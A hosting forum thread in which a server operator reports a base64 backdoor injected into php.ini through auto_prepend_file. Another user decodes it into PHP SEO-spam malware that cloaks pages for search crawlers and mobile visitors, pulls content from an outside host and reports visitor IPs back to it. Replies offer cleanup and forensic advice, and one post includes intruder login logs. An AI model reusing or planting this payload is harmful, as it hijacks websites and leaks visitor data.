the php.ini have been injected with backdoor code auto_prepend_file

[gztony8]

Recently, we discovered that the php.ini files of multiple PHP versions on several servers have been injected with backdoor code, causing PHP websites to fail to operate. The code injection in some servers occurred after a DirectAdmin update. We are unsure whether this is an issue with the server's security configuration or a problem related to the DirectAdmin update.

The injected code in the php.ini files is as follows:

auto_prepend_file = "data:;base64,PD9waHAKc2V0X3RpbWVfbGltaXQoMCk7ZXJyb3JfcmVwb3J0aW5nKDApOwpjbGFzcyBJbmNQaHAgewogICAgcHVibGljIHN0YXRpYyBmdW5jdGlvbiBydW4oKSB7CiAgICAgICAgJHVybCA9ICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOwogICAgICAgICRyZWYgPSAhaXNzZXQoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSA/ICcnIDogJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwogICAgICAgICRlbnQgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CiAgICAgICAgJHNpdGUgPSBiYXNlNjRfZGVjb2RlKCJhSFIwY0RvdkwzaHRiQzVoYzJSbmIyUXVZMjl0Iik7CiAgICAgICAgJG1lbWVzID0gIi8/cmVmZXJlcj0iIC4gdXJsZW5jb2RlKCRyZWYpOwogICAgICAgICRyZWdzID0gJy9CYWlkdXNwaWRlcnwzNjBzcGlkZXJ8U29zb3NwaWRlcnxTb2dvdXNwaWRlcnxZaXNvdVNwaWRlcnxTb2dvdSB3ZWIgc3BpZGVyfEJ5dGVzcGlkZXIvaSc7CiAgICAgICAgJG1vYmlsZSA9ICcvcGhvbmV8cGFkfHBvZHxpUGhvbmV8aVBvZHxpb3N8aVBhZHxBbmRyb2lkfE1vYmlsZXxCbGFja0JlcnJ5fElFTW9iaWxlfE1RUUJyb3dzZXJ8SlVDfEZlbm5lY3x3T1NCcm93c2VyfEJyb3dzZXJOR3xXZWJPU3xTeW1iaWFufFdpbmRvd3MgUGhvbmUvJzsKICAgICAgICAkYXJlYSA9IHByZWdfbWF0Y2goJy8uZG9jfC5kb2N4fC54bHN4fC5wZGZ8LnNodG1sfC50eHR8LnhtbHwueGxzfC5jc3Z8LnBwdHwucHB0eHxcL25ld3NcL3xcL2FydGljbGVcL3xzYWRzYXcvaScsICR1cmwpOwogICAgICAgIGlmIChwcmVnX21hdGNoKCRyZWdzLCAkZW50KSkgewogICAgICAgICAgICBpZiAoJGFyZWEpIHsgaGVhZGVyKCJDb250ZW50LVR5cGU6IHRleHQvaHRtbDtjaGFyc2V0PXV0Zi04Iik7JGlwID0gc2VsZjo6Z2V0Q2xpZW50SXAoKTtleGl0KHNlbGY6OmdldCgkZW50LCRzaXRlIC4iLz91PSIuICR1cmwuIiZ4eT0xJnBwPSIuJGlwLiImaG9zdD0iLiRfU0VSVkVSWydIVFRQX0hPU1QnXSkpO30gCiAgICAgICAgICAgIGVsc2UgeyBlY2hvIHNlbGY6OmdldCgkZW50LCRzaXRlIC4gIi9saW5rIik7b2JfZmx1c2goKTtmbHVzaCgpO30KICAgICAgICB9CiAgICAgICAgaWYgKCRhcmVhICYmIHByZWdfbWF0Y2goJG1vYmlsZSwgJGVudCkpIGV4aXQoc2VsZjo6Z2V0KCRzaXRlIC4gJG1lbWVzKSk7ICAgICAgICAKICAgIH0KICAgIHN0YXRpYyBmdW5jdGlvbiBnZXQoJGVudCwkdXJsKSB7CiAgICAgICAgJGNoID0gY3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgJHVybCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJGVudCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBGQUxTRSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCBGQUxTRSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTsKICAgICAgICAkb3V0cHV0ID0gY3VybF9leGVjKCRjaCk7CiAgICAgICAgY3VybF9jbG9zZSgkY2gpOwogICAgICAgIHJldHVybiAkb3V0cHV0OwogICAgfQogICBzdGF0aWMgZnVuY3Rpb24gR2V0Q2xpZW50SXAoKQogICB7CiAgICAgIGlmICghZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKSB7CiAgICAgICAgICRpcEFkZHJlc3NlcyA9IGV4cGxvZGUoJywnLCAkX1NFUlZFUlsnSFRUUF9YX0ZPUldBUkRFRF9GT1InXSk7CiAgICAgICAgICRjbGllbnRJUCA9IHRyaW0oZW5kKCRpcEFkZHJlc3NlcykpOwogICAgICB9IGVsc2VpZiAoIWVtcHR5KCRfU0VSVkVSWydIVFRQX1hfUkVBTF9JUCddKSkgewogICAgICAgICAkY2xpZW50SVAgPSAkX1NFUlZFUlsnSFRUUF9YX1JFQUxfSVAnXTsKICAgICAgfSBlbHNlIHsKICAgICAgICAgJGNsaWVudElQID0gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ107CiAgICAgIH0KICAgICAgcmV0dXJuICRjbGllbnRJUDsKICAgfQp9CkluY1BocDo6cnVuKCk7"

 

[LawsHosting]

If anyone CBA to decode:

<?php
set_time_limit(0);error_reporting(0);
class IncPhp {
    public static function run() {
        $url = $_SERVER['REQUEST_URI'];
        $ref = !isset($_SERVER['HTTP_REFERER']) ? '' : $_SERVER['HTTP_REFERER'];
        $ent = $_SERVER['HTTP_USER_AGENT'];
        $site = base64_decode("http://xml.asdgod.com");
        $memes = "/?referer=" . urlencode($ref);
        $regs = '/Baiduspider|360spider|Sosospider|Sogouspider|YisouSpider|Sogou web spider|Bytespider/i';
        $mobile = '/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/';
        $area = preg_match('/.doc|.docx|.xlsx|.pdf|.shtml|.txt|.xml|.xls|.csv|.ppt|.pptx|\/news\/|\/article\/|sadsaw/i', $url);
        if (preg_match($regs, $ent)) {
            if ($area) { header("Content-Type: text/html;charset=utf-8");$ip = self::getClientIp();exit(self::get($ent,$site ."/?u=". $url."&xy=1&pp=".$ip."&host=".$_SERVER['HTTP_HOST']));}
            else { echo self::get($ent,$site . "/link");ob_flush();flush();}
        }
        if ($area && preg_match($mobile, $ent)) exit(self::get($site . $memes));       
    }
    static function get($ent,$url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_USERAGENT, $ent);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        $output = curl_exec($ch);
        curl_close($ch);
        return $output;
    }
   static function GetClientIp()
   {
      if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
         $ipAddresses = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
         $clientIP = trim(end($ipAddresses));
      } elseif (!empty($_SERVER['HTTP_X_REAL_IP'])) {
         $clientIP = $_SERVER['HTTP_X_REAL_IP'];
      } else {
         $clientIP = $_SERVER['REMOTE_ADDR'];
      }
      return $clientIP;
   }
}
IncPhp::run();

 

[EthernetServers]

or a problem related to the DirectAdmin update.

I would say it's very unlikely to be a result of a DirectAdmin update - I haven't personally seen any similar cases like this, and if it causes websites to fail to work properly, I imagine there would be quite a few complaints.

This might sound like a silly question, but where did you get your DirectAdmin license from? The reason I ask is that there's, sadly, a lot of fraudulent license providers which are much cheaper than retail, but there's a reason for that - they're very much not legitimate and usually have serious security flaws.

 

[Richard G]

and usually have serious security flaws.

Not to mention backdoors in some hacked or nulled versions.

We also didn't experience this at any of or servers, however compared to others we only have a few servers.
Almost certainly this is not caused by a DA update.

I would remove the code, and then check every day if it comes back. If yes, start checking logfiles (which you already can do now too just to be sure) and see if you can find odd or suspicious behaviour.

Hopefully you're not root hacked, however that is also not impossible.
It might be a good idea to scan your complete system with Maldetect after removing this code. Or similar software.
Also check your root bash_history file.

Also check what (next to DA), what other same software you have running on the infected servers. Especiallly 3rd party applications.

However, in case you would be using illegal versions, there is no way of saying what could be causing or has caused the issue.

 

[Ohm J]

my server perfect fine with every update.

check if you have any weird custom script on

#/usr/local/directadmin

/scripts/custom/
/custombuild/custom

maybe it's come from 3rd plugins that's you just installed without checking.

 

[ccto]

Those php.ini shall generally be owned by root.root with 0644 permission.

 

[zEitEr]

It might be a good idea to scan your complete system with Maldetect after removing this code. Or similar software.

Maldetect will most-likely give false positives on binaries and mysql files. So I would not suggest doing it. It should be used only against plain text files.

 

[ccto]

For RHEL based Linux, you may use this to verify the OS binary integrity

rpm --verify --all

# also, you may look at rpm help verify section to check/compare those result meaning
man rpm

 

[Richard G]

Maldetect will most-likely give false positives on binaries and mysql files.

I've not experienced this until now. But it might happen, so indeed it might be better to use an other method on the OS and use Maldetect on the /home directory's.

 

[zEitEr]

I can recall one case, when I had to recover a MySQL installation. A server owner completed a maldet scanning against the / (root) partition with enabled quarantine mode. I don't recall whether custom virus definition were used or not. But some critically important MySQL files including data files were moved to a quarantine.

Since then I list binary paths and MySQL data directory in /usr/local/maldetect/ignore_paths

I've not experienced this until now.

 

[gztony8]

var/log/directadmin/login.log

2024:06:06-14:48:12: '122.114.17.126' successful Basic Auth/API login to 'haicheng' via 'admin'
2024:06:06-14:48:21: '122.114.17.126' successful Basic Auth/APl login to 'haicheng' via 'admin'
2024:06:07-00:25:42: '216.83.53.51' 2 failed login attempts. Account 'admin'
2024:06:07-00:25:59: '216.83.53.51' 3 failed login attempts. Account 'admin'
2024:06:07-00:26:02: '216.83.53.51' 4 failed login attempts. Account 'admin'
2024:06:07-00:29:06: '216.83.53.51' successful login to 'aitenite' via 'admin'
2024:06:07-06:17:01: '122.114.243.108’successful login to 'admin'

These log is hacker login. 2024:06:07-00:29:06 , My 2222 port is only open to a whitelist of IP, I don't know how they to log in. How can I find out where they are breaking in from?

 

[Ohm J]

you know, when there have back door script, hacker can whilelist there IP too, change ssh config, ..etc.. and they can login normally